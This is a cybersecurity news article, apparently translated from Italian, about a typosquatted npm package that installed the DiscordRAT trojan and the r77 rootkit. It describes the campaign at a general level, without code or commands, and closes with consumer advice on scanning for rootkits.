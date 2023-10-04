A new deceptive package hidden within the package registry npm was discovered distributing an open-source rootkit called r77, marking the first time a malicious package has provided rootkit functionality.

What do we know about r77

The package in question is node-hide-console-windowswhich mimics the legitimate npm package node-hide-console-window in one case of typosquatting; this package it was downloaded 704 times in the previous two months before it was removed.

ReversingLabs, which has identified first reported activity in August 2023, said the package “downloaded a Discord bot that facilitated the installation of an open-source rootkit, r77,” adding that “it seems that open-source projects can increasingly be considered a means of distributing malware“.

The malicious code, according to the cybersecurity company ReversingLabs, is contained in the index.js file of the package which, once executed, downloads an executable that is started automatically.

The executable in question is an open-source C#-based Trojan known as DiscordRAT 2.0which has features to remotely take control of a victim system via Discord using over 40 commands that facilitate the collection of sensitive data, disabling security software in the process.

One of the instructions is “!rootkit”, used to boot the r77 rootkit on the compromised system. r77, actively maintained by bytecode77is a “fileless ring 3 rootkit” designed to hide files and processes and can be included in other software or started directly.

This is far from the first time r77 has been used in real-world malicious campaigns, with bad actors using it as part of a series of attacks to distribute the SeroXen Trojan and cryptocurrency miners.

Additionally, two different versions of node-hide-console-windows that fetch an open-source information stealer called Blank-Grabber were found together with DiscordRAT 2.0, pretending to be a “visual code update”.

A noteworthy aspect of the campaign is that it is entirely based on components freely available online, requiring little effort on the part of bad actors to put it all together and opening up the “leads to supply chain attacks” even for criminals with less relevant objectives.

The research findings highlight the need for caution among developers when installing packages from open-source repositories. Last week, Fortinet FortiGuard Labs identified nearly three dozen modules with variations in coding style and execution methods that were equipped with data collection capabilities.

“The author or authors [di questo rootkit] they have made an effort to make their packages seem reliable“, said security researcher Lucija Valentić who then added, “The author(s) behind this campaign created an npm page that closely resembled the page of the typosquatting legitimate package, and even created 10 versions of the malicious package to mimic the package they were copying.”

What to do if you come across this rootkit like r77

Fortunately, there are multiple systems to get rid of these problems, but there is one that is unlikely to go wrong: good old Malwarebytes .

Malwarebytes anti malware, lucky for you has a rootkit search function, in advanced configurations, in fact, you can find the function to search for rootkits.

In addition to activating this function, you should also analyze the compressed archives, in case something is hidden inside the zip or rar files, the combination of these two options could take a long time (even 4 or 8 hours depending on how much data you have saved and how fast your PC is), but once the program has quarantined the threats, all you have to do is delete them.

However, remember that the most you have to do it yourself, not downloading things from strange sources and basically being careful.